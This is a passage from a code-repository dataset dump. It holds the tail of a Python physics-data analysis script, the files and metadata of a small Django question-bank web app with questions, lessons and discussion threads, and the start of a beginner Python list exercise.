functions\ndef genSeqFiltPol(sgn): \n def genSeqFilt(ds, seqAmp):\n ts=seqAmp.t[:,0,0]\n calArr=ds.calArr\n cal=MT.const_interp(ts, calArr.t, calArr.val)\n seqAmp.sig[sign(cal)!=sgn]*=nan\n return seqAmp\n return genSeqFilt\n\n\ndef seqFiltFuncAxisInterleave(axisAngle, Ndiv):\n def filt(seqAmp):\n return seqFiltFuncInterleave(Ndiv)((seqFiltFuncAxis(sgn)(seqAmp)))\n return filt\n#genSeqFiltPol(1)(seqAmp)\n\ndef seqFiltFuncAxis(axisAngle):\n def filt(seqAmp):\n mask= (nearby_angles(seqAmp.theta[:,0,0], axisAngle, 0.1) |\n nearby_angles(seqAmp.theta[:,0,0], axisAngle+pi,0.1) \n )\n return CorrelationData(*[s[mask] for s in seqAmp])\n return filt\n\ndef seqFiltFunc2Axes(axisAngle):\n def filt(seqAmp):\n mask= (nearby_angles(seqAmp.theta[:,0,0], axisAngle, 0.1) | \n nearby_angles(seqAmp.theta[:,0,0], axisAngle+pi,0.1) |\n nearby_angles(seqAmp.theta[:,0,0], axisAngle+pi/2,0.1) |\n nearby_angles(seqAmp.theta[:,0,0], axisAngle+3*pi/2,0.1) \n )\n return CorrelationData(*[s[mask] for s in seqAmp])\n return filt\ndef seqFiltFuncAngle(angle):\n def filt(seqAmp):\n mask= nearby_angles(seqAmp.theta[:,0,0], angle, 0.1)\n return CorrelationData(*[s[mask] for s in seqAmp])\n return filt\n\ndef seqFiltFuncSlc(slc):\n def filt(seqAmp):\n return CorrelationData(*[s[slc] for s in seqAmp])\n return filt\n\n\ndef seqFiltFuncInterleave(Ndiv):\n #slcL=[slice(k,None, Ndiv) for k in range(Ndiv)]\n def filt(seqAmp):\n Npts=seqAmp.t.shape[0]\n if Npts < 5*Ndiv:\n N = int(seqAmp.t.shape[0]/5)\n else:\n N=Ndiv\n Npts=floor(Npts/Ndiv)*Ndiv\n return [CorrelationData(*[s[k-Npts::N] for s in seqAmp]) for k in range(N)]\n return filt\n\ndef seqFiltFuncInterleaveGenerator(otherFiltF, Ndiv=10):\n #slcL=[slice(k,None, Ndiv) for k in range(Ndiv)]\n def filt(seqAmp, k):\n Npts=seqAmp.t.shape[0]\n if Npts < 5*Ndiv:\n N = int(seqAmp.t.shape[0]/5)\n else:\n N=Ndiv\n Npts=floor(Npts/Ndiv)*Ndiv\n if k>=N:\n return None\n return otherFiltF(CorrelationData(*[s[k-Npts::N] for s in seqAmp]))\n\n for k in range(Ndiv):\n #f=partial(filt, k=N)\n yield partial(filt, k=k)\n\ndef seqFiltFuncTime(Tdiv=1): #Divid it up into small chunks of time and process each\n def filt(seqAmp):\n totalTime=seqAmp.t[-1,0,0]-seqAmp.t[0,0,0]\n t0=seqAmp.t[0,0,0]\n N=floor(totalTime/Tdiv)\n startTimes=arange(N)*Tdiv + t0\n indxL=sliceSorted(seqAmp.t[:,0,0], startTimes, delta_t=Tdiv)\n return [CorrelationData(*[s[indx] for s in seqAmp]) for indx in indxL]\n return filt\n\ndef checkDSUnc(ds, Ndiv=10, **kwargs):\n #Process every Nth sequence:\n #fL=[seqFiltFuncSlc(slice(k,None, Ndiv)) for k in range(Ndiv)]\n #sidAmpL=[ds.sidAmp(filtF=f) for f in fL]\n sidAmpL=ds.sidAmp(seqFiltFuncInterleave(Ndiv), **kwargs)\n #sidAmpL=ds.sidAmp(filtF=seqFiltFuncTime(Tdiv=0.3))\n #wtMn, calcedUnc, apparentUnc, wtErr= spf.combine_angle_amps(sidAmpL, plot=True)\n combinedSid= spf.combine_angle_amps(sidAmpL, plot=True)\n\n #Probably don't need to rotate in this case, but just in case\n\n sidAmpFull=ds.sidAmp(**kwargs)\n print(\"Number of sets: {0}\".format(len(sidAmpL)))\n pprint(combinedSid)\n pprint(sidAmpFull)\n #print(\"Subset deviation: {}, combined Mean:{}\\n, combined unc (trust/don't trust): {}, {},\\n full mean:{}, full uncert {}\".format(wtErr, wtMn,\n #calcedUnc, apparentUnc, \n #sidAmpFull.sig, sqrt(sidAmpFull.err.diagonal())) )\n\n show()\n\ndef testDS(rSpec=None, rotFact=1, **kwargs):\n defaultD=dict(amp=0.05, sigma=2, amp2=0.00, \n N=10000000, phi=0*pi, \n zeroingTime=30, fracDev=0.00, \n sizeDev=50.0, startTime=0)\n defaultD.update(kwargs)\n rsBase=RotationSpec(startingAngle=0, delay=9, interval=10, numRotations=20, rotAngles=[rotFact*180], extraRotAngle=rotFact*90)\n rSpec= rSpec if rSpec is not None else rsBase\n sd,sig=makeTestData(\n rSpec, **defaultD)\n ds=SPDataSet('test', preloadDict={'fastD': [sd, sig, 'sig']}, rSpec=rSpec, windowD={'sig': Window(5, -6)} )\n return ds\n\ndef testDS2(rSpec=None, rotDir=1, **kwargs):\n defaultD=dict(amp=0.5, sigma=1.0, amp2=0.0, \n N=1000000, phi=0.25*pi, \n zeroingTime=30, fracDev=0.00, \n sizeDev=00.0, startTime=0)\n defaultD.update(kwargs)\n rsBase=RotationSpec(startingAngle=0, delay=9, interval=10, numRotations=8, rotAngles=[rotDir*90], extraRotAngle=rotDir*45)\n rSpec= rSpec if rSpec is not None else rsBase\n sd,sig=makeTestData(\n rSpec, **defaultD)\n ds=SPDataSet('test', preloadDict={'fastD': [sd, sig, 'sig']}, rSpec=rSpec, windowD={'sig': Window(5, -6)} )\n return ds\n\nif __name__==\"__main__\":\n d=dict(sigWindow=Window(4,-5))\n if 0:\n sidAmpL=[]\n if 0: # Check theoretical\n rsBase=RotationSpec(startingAngle=0, delay=9, interval=10, numRotations=20, rotAngles=[-180], extraRotAngle=-90)\n rsL=[rsBase._replace(startingAngle=th) for th in hstack([zeros(15), -ones(0)*90, ones(0)*45])]\n for rs, startTime in zip(rsL, 0.2*arange(len(rsL))):\n sd,sig=makeTestData(\n rs, amp=1.00, sigma=2, N=400000, phi=0*pi, zeroingTime=30, fracDev=0.05, sizeDev=50.0, startTime=startTime*1)\n\n ds=SPDataSet('test', preloadDict={'fastD': [sd, sig, 'sig']}, rSpec=rs )\n sAmp=ds.sidAmp(sigWindow=Window(4,-5))\n vprint(sAmp)\n sidAmpL.append(sAmp)\n elif 0: #Check slicing\n ds=testDS()\n checkDSUnc(ds, 30)\n #sAmp=ds.sidAmp(sigWindow=Window(4,-5))\n #vprint sAmp\n\n \n #EW-NS\n #sidAmpAngsL=[ds.sidAmp(sigWindow=Window(4,-5), filtF=seqFiltFuncAxis(ang)) for ang in (0, pi/2)]\n #sidAmpL=sidAmpSlcsL\n\n\n \n\n\n\n else: #Check actual data\n timestampL=[\n #'5209.26',\n #'5240.33',\n '5249.72',\n '5273.74',\n '5282.23',\n '5292.71',\n '5294.31',\n #'5296.33',\n '5310.41',\n '5318.41',\n '5348.82',\n '5369.87',\n '5386.02',\n '5390.74',\n ]\n for ts in timestampL:\n #try:\n ds=SPDataSet(ts)#, preloadDict={'fastD': [sd, sig, 'sig']}, rSpec=rSpec )\n ds.checkDirections()\n show()\n sAmp=ds.sidAmp()\n vprint(sAmp)\n sidAmpL.append(sAmp)\n #except Exception as (errno, strerror):\n # vprint \"Exception({0}): {1}\".format(errno, strerror)\n # vprint(\"For timestamp: {0}\".format(ts))\n #pass; #Print the error and say which set it was, but keep going.\n \n ts = [ sAmp.t for sAmp in sidAmpL]\n (ths, ys, covs)= zip(*[ rotate_quadrature_sample(sAmp.labTheta, sAmp.sig, sAmp.err) for sAmp in sidAmpL])\n #ys, covs= [ ]\n\n ys=array(ys)\n errs=array([sqrt(cov.diagonal()) for cov in covs])\n ts=array(ts)\n #errs=[diag(cov) for cov in covs]\n figure()\n for t, y, e in zip(ts.T, ys.T, errs.T):\n errorbar( t, y, e, fmt='.') #Probaby not quite right\n\n mn, wEr, unc= weightedStats(ys, 1./errs**2, axis=0)\n vprint(\"Subset deviation: {0}, (average errorbar):{1},\\nmean: {2},, (from subsets): {3}, final uncert: (full){4}\".format(er, errs.mean(axis=0), mn, unc, None) )\n show()\n\n \n \n #seqAxNSFilt= seqFiltFuncAxis(0);\n #seqAxEWFilt= seqFiltFuncAxis(pi/2);\n if 0: #Do idiot checks on experiment data\n timestampL=[\n #'5310.41',\n '5318.42',\n #'5348.82',\n #'5369.87',\n #'5386.02',\n #'5390.74',\n #'5393.04',\n ]\n \n for ts in timestampL:\n ds=SPDataSet(ts)\n ds.checkDirections(bPlot=True)\n show()\n ds.edit_set_info()\n raw_input('enter to continue')\n #ds.checkDirections(**d)\n #SPDataSet('5386.02').checkDirections(**d)\n #SPDataSet('5310.41').checkDirections(**d)\n #SPDataSet('5348.82').checkDirections(**d)\n #SPDataSet('5369.87').checkDirections(**d)\n if 0:\n for ts in loadSPFiles.getAllTimeStamps():\n if float(ts)>5310:\n ds=SPDataSet(ts)\n if ds.set_info['bUseful']=='unknown' or 1:\n st=''\n while st!='c':\n vprint(\"Current timestamp is: {0}\".format(ts))\n ds.edit_set_info()\n #ds.viewRaw()\n ds.viewSeq()\n ds.viewSeq(rawData='rel:Tilt Sensor 1')\n ds.checkDirections()\n #ds.viewSeq()\n #try:\n # ds.checkDirections()\n #except Exception as ex:\n # vprint (\"Exception occured: {0}\".format(ex))\n show()\n st=raw_input('Enter for again, c+enter to continue to next')\n\n" } ]
44
herougo/QuestionBank
https://github.com/herougo/QuestionBank
43a1be58349064060847a425a263713acac16ad5
70f145a2d939f57fc2d0d4251c8ed14557329fed
0f02479063a1964892d6bd697e5194c51436d326
refs/heads/master
2021-01-25T07:27:44.379957
2014-12-19T17:37:00
2014-12-19T17:37:00
28,192,056
1
3
null
2014-12-18T16:43:11
2014-12-18T16:43:11
2014-12-19T17:35:03
null
[ { "alpha_fraction": 0.6487804651260376, "alphanum_fraction": 0.6585366129875183, "avg_line_length": 28.428571701049805, "blob_id": "2ee4af909695c9199f45a32d534bf76a6c0cce25", "content_id": "a553d1074b5660ba8fe1c91cecac09fb1b91c463", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 205, "license_type": "no_license", "max_line_length": 84, "num_lines": 7, "path": "/lessons/urls.py", "repo_name": "herougo/QuestionBank", "src_encoding": "UTF-8", "text": "from django.conf.urls import url\nfrom lessons import views\n\nurlpatterns = [\n url(r'^$', views.index, name='index'),\n url(r'^(?P<lesson_id>[0-9]+)/$', views.lesson_template, name='lesson_template'),\n]" }, { "alpha_fraction": 0.653333306312561, "alphanum_fraction": 0.653333306312561, "avg_line_length": 17.75, "blob_id": "102b8250fe8bf06a08cb472305c437a9c8944e23", "content_id": "11adff2f9998359bdc112857db0a95a5e3f04de7", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "JavaScript", "length_bytes": 75, "license_type": "no_license", "max_line_length": 38, "num_lines": 4, "path": "/questions/static/js/main.js", "repo_name": "herougo/QuestionBank", "src_encoding": "UTF-8", "text": "$(document).ready(function() {\n // Add document functionality here\n\n});\n" }, { "alpha_fraction": 0.7441016435623169, "alphanum_fraction": 0.7441016435623169, "avg_line_length": 35.79999923706055, "blob_id": "8b6fcef2384511375408993db7565c41fa726335", "content_id": "85f43a579d06a2c360e85523927226af528d3821", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 551, "license_type": "no_license", "max_line_length": 71, "num_lines": 15, "path": "/discussions/views.py", "repo_name": "herougo/QuestionBank", "src_encoding": "UTF-8", "text": "from django.shortcuts import render\nfrom discussions.models import Thread, Comment\n\n\ndef index(request):\n all_discussions = Thread.objects.all()\n context = {'discussion_list': all_discussions}\n return render(request, 'discussions/index.html', context)\n\n\ndef thread_template(request, discussion_id):\n comments = Comment.objects.filter(thread=discussion_id)\n title = Thread.objects.get(id=discussion_id).title\n context = {'comment_list': comments, 'title': title}\n return render(request, 'discussions/thread_template.html', context)" }, { "alpha_fraction": 0.8201438784599304, "alphanum_fraction": 0.8201438784599304, "avg_line_length": 34, "blob_id": "7a4ac5740cf4a5df7a598b81b814ce516fe9a0ff", "content_id": "4b43cfbd9a61033928cef7cebb4909f7187e8209", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 139, "license_type": "no_license", "max_line_length": 55, "num_lines": 4, "path": "/questions/admin.py", "repo_name": "herougo/QuestionBank", "src_encoding": "UTF-8", "text": "from django.contrib import admin\nfrom questions.models import Question, Solution, Source\n\nadmin.site.register([Question, Solution, Source])" }, { "alpha_fraction": 0.5972073078155518, "alphanum_fraction": 0.6063372492790222, "avg_line_length": 26.397058486938477, "blob_id": "f971d18568b861cfe0b619d0a1c86b9b30e9d443", "content_id": "23f106422af4228ab7cd6c0f758e69c5a570ea3b", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1862, "license_type": "no_license", "max_line_length": 117, "num_lines": 68, "path": "/questions/models.py", "repo_name": "herougo/QuestionBank", "src_encoding": "UTF-8", "text": "from django.db import models\nfrom django.contrib.auth.models import User\nfrom discussions.models import Thread\n\n\nclass Solution(models.Model):\n solution_text = models.TextField()\n\n def __str__(self):\n return self.solution_text[:50]\n\n\nclass Source(models.Model):\n source_name = models.CharField(max_length=64)\n source_url = models.CharField(max_length=256)\n\n def __str__(self):\n return self.source_name\n\n\nclass Question(models.Model):\n MATH = \"MATH\"\n PMATH = \"PMATH\"\n CS = \"CS\"\n CO = \"CO\"\n STAT = \"STAT\"\n ACTSCI = \"ACTSCI\"\n AMATH = \"AMATH\"\n\n SUBJECTS = (\n (MATH, \"Mathematics\"),\n (PMATH, \"Pure Mathematics\"),\n (CS, \"Computer Science\"),\n (CO, \"Combinatorics and Optimization\"),\n (STAT, \"Statistics\"),\n (ACTSCI, \"Actuarial Science\"),\n (AMATH, \"Applied Mathematics\"),\n )\n\n E = \"E\"\n M = \"M\"\n H = \"H\"\n\n DIFFICULTY = (\n (E, \"Easy\"),\n (M, \"Medium\"),\n (H, \"Hard\"),\n )\n\n question_title = models.CharField(max_length=64)\n question_text = models.TextField()\n\n subject = models.CharField(max_length=5, choices=SUBJECTS, default=MATH)\n difficulty = models.CharField(max_length=1, choices=DIFFICULTY, default=M)\n\n solution = models.ForeignKey(Solution, blank=True, null=True)\n # lesson = models.ForeignKey(Lesson, blank=True, null=True)\n source = models.ForeignKey(Source, blank=True, null=True)\n # discussion = models.ForeignKey(Thread, editable=False)\n\n def __str__(self):\n return \"{0} - {1}: {2}\".format(self.difficulty, self.subject,\n self.question_title[:50])\n\n def save(self):\n if not self.id:\n self.discussion = Thread.objects.create_thread(User.objects.get(id=1), self.question_title, self.subject)\n super(Question, self).save()" }, { "alpha_fraction": 0.5670911073684692, "alphanum_fraction": 0.5719882249832153, "avg_line_length": 34.2068977355957, "blob_id": "32d1d4bc21f09f4ad78981c094e31d33d2a30b8f", "content_id": "b95081592d745c033cdf1f6d802027419a8bab8e", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1021, "license_type": "no_license", "max_line_length": 116, "num_lines": 29, "path": "/discussions/migrations/0002_comment.py", "repo_name": "herougo/QuestionBank", "src_encoding": "UTF-8", "text": "# encoding: utf8\nfrom django.db import models, migrations\nfrom django.conf import settings\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n migrations.swappable_dependency(settings.AUTH_USER_MODEL),\n ('discussions', '0001_initial'),\n ]\n\n operations = [\n migrations.CreateModel(\n name='Comment',\n fields=[\n (u'id', models.AutoField(verbose_name=u'ID', serialize=False, auto_created=True, primary_key=True)),\n ('comment_text', models.TextField()),\n ('creator', models.ForeignKey(to=settings.AUTH_USER_MODEL, to_field=u'id')),\n ('thread', models.ForeignKey(to='discussions.Thread', to_field=u'id')),\n ('upvotes', models.PositiveSmallIntegerField()),\n ('downvotes', models.PositiveSmallIntegerField()),\n ('date', models.DateTimeField(editable=False)),\n ],\n options={\n },\n bases=(models.Model,),\n ),\n ]\n" }, { "alpha_fraction": 0.5198618173599243, "alphanum_fraction": 0.5250431895256042, "avg_line_length": 25.31818199157715, "blob_id": "83e44deceb8cfcb2cfa5f32dfa364d06c7f4a48f", "content_id": "02f9baaf1076a602cb8f730e47ca151b9af4a98c", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 579, "license_type": "no_license", "max_line_length": 116, "num_lines": 22, "path": "/lessons/migrations/0001_initial.py", "repo_name": "herougo/QuestionBank", "src_encoding": "UTF-8", "text": "# encoding: utf8\nfrom django.db import models, migrations\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ]\n\n operations = [\n migrations.CreateModel(\n name='Lesson',\n fields=[\n (u'id', models.AutoField(verbose_name=u'ID', serialize=False, auto_created=True, primary_key=True)),\n ('lesson_name', models.CharField(default='', max_length=64)),\n ('lesson_text', models.TextField()),\n ],\n options={\n },\n bases=(models.Model,),\n ),\n ]\n" }, { "alpha_fraction": 0.6619718074798584, "alphanum_fraction": 0.67136150598526, "avg_line_length": 29.571428298950195, "blob_id": "fff3b1bd20f99d24db539bf7751a4b7ab95580ab", "content_id": "449bcb4157d9c54165d6cf179cebd8da2212e8f2", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 213, "license_type": "no_license", "max_line_length": 90, "num_lines": 7, "path": "/questions/urls.py", "repo_name": "herougo/QuestionBank", "src_encoding": "UTF-8", "text": "from django.conf.urls import url\nfrom questions import views\n\nurlpatterns = [\n url(r'^$', views.index, name='index'),\n url(r'^(?P<question_id>[0-9]+)/$', views.question_template, name='question_template'),\n]" }, { "alpha_fraction": 0.5260804891586304, "alphanum_fraction": 0.5310481786727905, "avg_line_length": 41.82978820800781, "blob_id": "fafd34b7d3bfb49d86e090bd3afff45d12ec8d69", "content_id": "767ba8a9c130506b98883f653052c0611394a6a4", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2013, "license_type": "no_license", "max_line_length": 303, "num_lines": 47, "path": "/questions/migrations/0001_initial.py", "repo_name": "herougo/QuestionBank", "src_encoding": "UTF-8", "text": "# encoding: utf8\nfrom django.db import models, migrations\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ]\n\n operations = [\n migrations.CreateModel(\n name='Solution',\n fields=[\n (u'id', models.AutoField(verbose_name=u'ID', serialize=False, auto_created=True, primary_key=True)),\n ('solution_text', models.TextField()),\n ],\n options={\n },\n bases=(models.Model,),\n ),\n migrations.CreateModel(\n name='Source',\n fields=[\n (u'id', models.AutoField(verbose_name=u'ID', serialize=False, auto_created=True, primary_key=True)),\n ('source_name', models.CharField(max_length=64)),\n ('source_url', models.CharField(max_length=256)),\n ],\n options={\n },\n bases=(models.Model,),\n ),\n migrations.CreateModel(\n name='Question',\n fields=[\n (u'id', models.AutoField(verbose_name=u'ID', serialize=False, auto_created=True, primary_key=True)),\n ('question_title', models.CharField(max_length=64)),\n ('question_text', models.TextField()),\n ('subject', models.CharField(default='MATH', max_length=5, choices=[('MATH', 'Mathematics'), ('PMATH', 'Pure Mathematics'), ('CS', 'Computer Science'), ('CO', 'Combinatorics and Optimization'), ('STAT', 'Statistics'), ('ACTSCI', 'Actuarial Science'), ('AMATH', 'Applied Mathematics')])),\n ('difficulty', models.CharField(default='M', max_length=1, choices=[('E', 'Easy'), ('M', 'Medium'), ('H', 'Hard')])),\n ('solution', models.ForeignKey(to_field=u'id', blank=True, to='questions.Solution', null=True)),\n ('source', models.ForeignKey(to_field=u'id', blank=True, to='questions.Source', null=True)),\n ],\n options={\n },\n bases=(models.Model,),\n ),\n ]\n" }, { "alpha_fraction": 0.6461318135261536, "alphanum_fraction": 0.6461318135261536, "avg_line_length": 29.39130401611328, "blob_id": "67f1e0becfcd684680c7ee78b2706e646c4d8126", "content_id": "992725aa208bdc681fb953acfe0b6a542a04ba70", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 698, "license_type": "no_license", "max_line_length": 104, "num_lines": 23, "path": "/question_bank/urls.py", "repo_name": "herougo/QuestionBank", "src_encoding": "UTF-8", "text": "from django.conf.urls import patterns, include, url\nfrom django.contrib import admin\nfrom django.conf import settings\n\n\ndef home(request):\n from django.shortcuts import render\n return render(request, 'index.html', {})\n\nurlpatterns = patterns(\n '',\n url(r'^$', home, name='home'),\n url(r'^home/', home, name='home'),\n url(r'^questions/', include('questions.urls')),\n url(r'^discussions/', include('discussions.urls')),\n url(r'^lessons/', include('lessons.urls')),\n url(r'^admin/', include(admin.site.urls)),\n)\n\nif settings.DEBUG:\n urlpatterns += patterns('',\n (r'^static/(?P<path>.*)$', 'django.views.static.serve', {'document_root': settings.MEDIA_ROOT}),\n )" }, { "alpha_fraction": 0.6619718074798584, "alphanum_fraction": 0.67136150598526, "avg_line_length": 29.571428298950195, "blob_id": "376d4ea395df25a9f90bc0920a36095c5b601034", "content_id": "5ae014109153c666934454a4a41973ccfd56c61d", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 213, "license_type": "no_license", "max_line_length": 88, "num_lines": 7, "path": "/discussions/urls.py", "repo_name": "herougo/QuestionBank", "src_encoding": "UTF-8", "text": "from django.conf.urls import url\nfrom discussions import views\n\nurlpatterns = [\n url(r'^$', views.index, name='index'),\n url(r'^(?P<discussion_id>[0-9]+)/$', views.thread_template, name='thread_template'),\n]" }, { "alpha_fraction": 0.6199365854263306, "alphanum_fraction": 0.6248679161071777, "avg_line_length": 31.272727966308594, "blob_id": "030f5939d96b1528ffa91f28b8a31e1ccb3315a0", "content_id": "c6aed0086705c70e29e5787074fd0e2e74426230", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2839, "license_type": "no_license", "max_line_length": 81, "num_lines": 88, "path": "/discussions/models.py", "repo_name": "herougo/QuestionBank", "src_encoding": "UTF-8", "text": "from datetime import datetime\nfrom django.db import models\nfrom django import forms\nfrom django.contrib.auth.models import User\n\n\nclass ThreadForm(forms.Form):\n # Attach to view for users to create a thread\n def __init__(self, request):\n from questions.models import Question\n self.fields = (\n forms.CharField(field_name=\"Title\", maxlength=128, is_required=True),\n forms.ChoiceField(field_name=\"Subject\", choices=Question.SUBJECTS)\n )\n self.request = request\n\n def save(self, new_data):\n return Thread.objects.create_thread(\n self.request.user, new_data['Title'], new_data['Subject'])\n\n\nclass ThreadManager(models.Manager):\n def create_thread(self, user, title, subject=None):\n new_thread = self.model(title=title, creator=user,\n upvotes=0, downvotes=0, date=datetime.today())\n new_thread.save()\n return new_thread\n\n\nclass Thread(models.Model):\n creator = models.ForeignKey(User)\n title = models.CharField(max_length=128)\n upvotes = models.PositiveSmallIntegerField()\n downvotes = models.PositiveSmallIntegerField()\n date = models.DateTimeField(editable=False)\n\n objects = ThreadManager()\n\n def __str__(self):\n return self.title + \" (\" + str(self.creator) + \")\"\n\n def save(self):\n if not self.id:\n self.date = datetime.today()\n super(Thread, self).save()\n\n\nclass CommentForm(forms.Form):\n # Attach to view for users to comment\n def __init__(self, request):\n self.fields = (\n forms.TextField(field_name=\"Comment\"),\n forms.ModelChoiceField(field_name=\"Thread\",\n queryset=Thread.objects.all()),\n )\n self.request = request\n\n def save(self, new_data):\n return Comment.objects.create_comment(\n self.request.user, new_data['Comment'], new_data['Thread'])\n\n\nclass CommentManager(models.Manager):\n def create_comment(self, user, comment_text, thread):\n new_comment = self.model(comment_text=comment_text, creator=user,\n thread=thread, upvotes=0, downvotes=0,\n date=datetime.today())\n new_comment.save()\n return new_comment\n\n\nclass Comment(models.Model):\n comment_text = models.TextField()\n creator = models.ForeignKey(User)\n thread = models.ForeignKey(Thread)\n upvotes = models.PositiveSmallIntegerField()\n downvotes = models.PositiveSmallIntegerField()\n date = models.DateTimeField(editable=False)\n\n objects = CommentManager()\n\n def __str__(self):\n return self.creator.username[:20] + \": \" + self.comment_text[:40]\n\n def save(self):\n if not self.id:\n self.date = datetime.today()\n super(Comment, self).save()" }, { "alpha_fraction": 0.5639344453811646, "alphanum_fraction": 0.5792349576950073, "avg_line_length": 27.59375, "blob_id": "9f4114390f53bbcceac5fff7bee183a5a4085f02", "content_id": "8793a7392b3f01b2c8ec4541d5065db58bfa89c2", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 915, "license_type": "no_license", "max_line_length": 115, "num_lines": 32, "path": "/lessons/migrations/0002_auto_20141126_0140.py", "repo_name": "herougo/QuestionBank", "src_encoding": "UTF-8", "text": "# encoding: utf8\nfrom django.db import models, migrations\nfrom django.conf import settings\nimport datetime\nfrom django.contrib.auth.models import User\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ('lessons', '0001_initial'),\n ]\n\n operations = [\n migrations.RenameField(\n model_name='lesson',\n old_name='lesson_name',\n new_name='title',\n ),\n # migrations.AddField(\n # model_name='lesson',\n # name='creator',\n # field=models.ForeignKey(to=settings.AUTH_USER_MODEL, default=User.objects.get(id=1), to_field=u'id'),\n # preserve_default=False,\n # ),\n migrations.AddField(\n model_name='lesson',\n name='date',\n field=models.DateTimeField(default=datetime.date(2014, 11, 26), editable=False),\n preserve_default=False,\n ),\n ]\n" }, { "alpha_fraction": 0.6202898621559143, "alphanum_fraction": 0.626086950302124, "avg_line_length": 27.79166603088379, "blob_id": "a50def7dbb2a6b6213c3e672bae49ae1a2d10526", "content_id": "66756e21cc29f478222e73cb8405f396fef34bea", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 690, "license_type": "no_license", "max_line_length": 76, "num_lines": 24, "path": "/lessons/models.py", "repo_name": "herougo/QuestionBank", "src_encoding": "UTF-8", "text": "from datetime import datetime\nfrom django.db import models\n\n\nclass LessonManager(models.Manager):\n def create_lesson(self, user, title, text, subject=None):\n new_lesson = self.model(title=title, creator=user, lesson_text=text,\n date=datetime.today())\n new_lesson.save()\n return new_lesson\n\n\nclass Lesson(models.Model):\n title = models.CharField(max_length=64, default=\"\")\n lesson_text = models.TextField()\n date = models.DateTimeField(editable=False)\n\n def __str__(self):\n return self.title[:50]\n\n def save(self):\n if not self.id:\n self.date = datetime.today()\n super(Lesson, self).save()" }, { "alpha_fraction": 0.8235294222831726, "alphanum_fraction": 0.8235294222831726, "avg_line_length": 29, "blob_id": "1f0fe95185fac288e6fe3cf1f8abea3972b3ea47", "content_id": "e8f926726f703e64fdb9999bf2ff8b91618e6d37", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 119, "license_type": "no_license", "max_line_length": 46, "num_lines": 4, "path": "/discussions/admin.py", "repo_name": "herougo/QuestionBank", "src_encoding": "UTF-8", "text": "from django.contrib import admin\nfrom discussions.models import Thread, Comment\n\nadmin.site.register([Thread, Comment])" }, { "alpha_fraction": 0.722347617149353, "alphanum_fraction": 0.7358916401863098, "avg_line_length": 33.153846740722656, "blob_id": "84813ecf07c8a6ab2d32556c558e6369bfa540c4", "content_id": "bc8982089e843504600b4135e18f329d6efe6999", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 443, "license_type": "no_license", "max_line_length": 79, "num_lines": 13, "path": "/questions/views.py", "repo_name": "herougo/QuestionBank", "src_encoding": "UTF-8", "text": "from django.shortcuts import render, get_object_or_404\nfrom questions.models import Question\n\n\ndef index(request):\n all_questions = Question.objects.all()\n context = {'question_list': all_questions}\n return render(request, 'questions/index.html', context)\n\n\ndef question_template(request, question_id):\n q = get_object_or_404(Question, id=question_id)\n return render(request, 'questions/question_template.html', {'question': q})" }, { "alpha_fraction": 0.7036144733428955, "alphanum_fraction": 0.7180722951889038, "avg_line_length": 31, "blob_id": "59e11b9612665fc2d50d031d0fcea868dc198e72", "content_id": "cedd53d7102a0f8fe7dc2b20cb02b255e6993140", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 415, "license_type": "no_license", "max_line_length": 73, "num_lines": 13, "path": "/lessons/views.py", "repo_name": "herougo/QuestionBank", "src_encoding": "UTF-8", "text": "from django.shortcuts import render, get_object_or_404\nfrom lessons.models import Lesson\n\n\ndef index(request):\n all_lessons = Lesson.objects.all()\n context = {'lesson_list': all_lessons}\n return render(request, 'lessons/index.html', context)\n\n\ndef lesson_template(request, lesson_id):\n l = get_object_or_404(Lesson, id=lesson_id)\n return render(request, 'lessons/lesson_template.html', {'lesson': l})" } ]
17
Altahoma/python-learn
https://github.com/Altahoma/python-learn
340246ffd63f2c9f51b55b5535d321c1a1513437
0d3677f0a11de8428baa2b83746d2fc3437c2c6a
001b29a1c92cae4875ae128194d9177608ff73a9
refs/heads/master
2020-05-19T20:29:07.516655
2019-05-12T12:13:53
2019-05-12T12:13:53
185,202,286
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.7702702879905701, "alphanum_fraction": 0.7770270109176636, "avg_line_length": 18.34782600402832, "blob_id": "fb2e6da32f6f7389fb0f2287859e91cf91692fc3", "content_id": "9caa951ddf6b6a53253d08b6de4d2c66158ff823", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 444, "license_type": "no_license", "max_line_length": 46, "num_lines": 23, "path": "/motorcycles.py", "repo_name": "Altahoma/python-learn", "src_encoding": "UTF-8", "text": "motorcycles = ['honda', 'yamaha', 'suzuki']\nprint(motorcycles)\n\nmotorcycles.append('ducati')\nprint(motorcycles)\n\nmotorcycles.insert(0, 'bmw')\nprint(motorcycles)\n\ndel motorcycles[2]\nprint(motorcycles)\n\npoped_motorcycle = motorcycles.pop()\nprint(motorcycles)\nprint(poped_motorcycle)\n\nlast_owned = motorcycles.pop(-1)\nprint(motorcycles)\nprint(last_owned)\n\nremoved_motorcycle = motorcycles.remove('bmw')\nprint(motorcycles)\nprint(removed_motorcycle)" }, { "alpha_fraction": 0.6909090876579285, "alphanum_fraction": 0.6909090876579285, "avg_line_length": 55, "blob_id": "06ca741528db1515229363905902a9b92d413e13", 